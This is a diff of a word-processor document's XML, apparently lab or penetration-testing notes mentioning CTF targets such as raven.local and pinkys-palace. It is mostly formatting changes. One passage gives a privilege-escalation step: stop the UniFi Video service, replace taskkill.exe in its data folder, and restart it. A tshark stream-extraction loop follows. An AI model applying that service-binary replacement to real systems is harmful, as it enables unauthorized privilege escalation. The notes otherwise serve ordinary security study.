+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>Stop-Service "Ubiquiti UniFi Video"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PreformattedText"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>do action (Ex replace taskkill.exe in C:\DataProgram\unifi-video)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PreformattedText"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>Start-Service "Ubiquiti UniFi Video"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PreformattedText"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:rPr/>
       </w:r>
     </w:p>
@@ -12382,7 +13609,13 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b/>
+          <w:b/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12399,7 +13632,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12434,7 +13674,9 @@
       <w:hyperlink r:id="rId33">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel4"/>
+            <w:color w:val="000080"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://raven.local/wordpress/</w:t>
         </w:r>
@@ -12456,7 +13698,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="darkYellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12538,7 +13782,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12566,7 +13817,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12585,7 +13844,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12604,7 +13871,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12718,7 +13993,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12730,7 +14007,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12742,7 +14021,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12754,7 +14035,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12766,7 +14049,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12778,7 +14063,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12877,7 +14164,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12889,7 +14178,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12901,7 +14192,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12913,7 +14206,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13027,7 +14322,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13046,7 +14349,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13162,7 +14473,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13181,7 +14500,16 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13201,7 +14529,16 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13221,7 +14558,16 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13267,7 +14613,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13286,7 +14640,16 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13306,7 +14669,16 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13326,7 +14698,16 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13346,7 +14727,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13365,7 +14754,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13384,7 +14781,16 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13404,7 +14810,16 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13450,7 +14865,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13524,7 +14947,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13594,7 +15024,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13612,7 +15049,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13630,7 +15074,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13646,36 +15097,42 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t>for stream in `tshark -r 012987veronica.cap -T fields -e tcp.stream | sort -n | uniq`</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t>do</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -13688,12 +15145,14 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -13706,7 +15165,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13762,7 +15223,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13780,7 +15248,15 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13799,7 +15275,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13817,7 +15300,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13835,7 +15325,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13868,9 +15365,11 @@
       <w:hyperlink r:id="rId35">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel11"/>
             <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+            <w:color w:val="000080"/>
             <w:kern w:val="0"/>
+            <w:u w:val="single"/>
             <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t>pinkys-palace</w:t>
@@ -13892,7 +15391,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13915,11 +15421,13 @@
       <w:hyperlink r:id="rId36">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel12"/>
             <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
+            <w:color w:val="000080"/>
             <w:kern w:val="0"/>
+            <w:u w:val="single"/>
             <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t>http://pinkys-palace:808</w:t>
@@ -13938,9 +15446,11 @@
       <w:hyperlink r:id="rId37">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel11"/>
             <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+            <w:color w:val="000080"/>
             <w:kern w:val="0"/>
+            <w:u w:val="single"/>
             <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t>http://127.0.0.1</w:t>
@@ -13949,11 +15459,13 @@
       <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel12"/>
             <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
+            <w:color w:val="000080"/>
             <w:kern w:val="0"/>
+            <w:u w:val="single"/>
             <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t>:8080</w:t>
@@ -13980,11 +15492,13 @@
       <w:hyperlink r:id="rId39">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel12"/>
             <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
+            <w:color w:val="000080"/>
             <w:kern w:val="0"/>
+            <w:u w:val="single"/>
             <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t>http://192.168.130.168</w:t>
@@ -14003,11 +15517,13 @@
       <w:hyperlink r:id="rId40">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel12"/>
             <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
+            <w:color w:val="000080"/>
             <w:kern w:val="0"/>
+            <w:u w:val="single"/>
             <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
